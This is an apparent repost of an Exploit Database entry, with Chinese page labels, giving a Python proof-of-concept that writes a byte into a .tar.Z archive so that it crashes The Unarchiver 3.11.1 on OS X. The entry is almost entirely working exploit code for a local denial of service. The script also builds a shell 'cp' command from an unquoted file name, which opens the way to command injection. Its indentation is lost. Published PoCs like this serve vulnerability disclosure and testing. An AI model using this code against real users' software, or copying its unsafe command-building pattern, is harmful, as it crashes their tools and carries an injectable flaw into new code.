The Unarchiver 3.11.1 – ‘.tar.Z’ Crash (PoC)

• Exploit Database
• 12 阅读

• 作者： Antonio Z.
  日期： 2016-10-18
• 类别：

  • dos
  平台：

  • osx
• 来源：https://www.exploit-db.com/exploits/40570/

• # Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
  # Date: 10-17-2016
  # Exploit Author: Antonio Z.
  # Vendor Homepage: http://unarchiver.c3.cx/unarchiver
  # Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
  # Version: 3.11.1
  # Tested on: OS X 10.10, OS X 10.11, OS X 10.12
  
  # More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
  
  import os, struct, sys
  from mmap import mmap
  
  if len(sys.argv) <= 1:
  print "Usage: python Local_Crash_PoC.py [file name]"
  exit()
  
  file_name = sys.argv[1]
  file_mod = open(file_name, 'r+b')
  file_hash = file_mod.read()
  
  def get_extension(file_name):
  basename = os.path.basename(file_name)
  extension = '.'.join(basename.split('.')[1:])
  return '.' + extension if extension else None
  
  def file_maping():
  maping = mmap(file_mod.fileno(),0)
  maping.seek(2)
  maping.write_byte(struct.pack('B', 255))
  maping.close()
  
  new_file_name = "Local_Crash_PoC" + get_extension(file_name)
  
  os.popen('cp ' + file_name + ' ' + new_file_name)
  file_mod = open(new_file_name, 'r+b')
  file_maping()
  file_mod.close()
  print '[+] ' + 'Created file: ' + new_file_name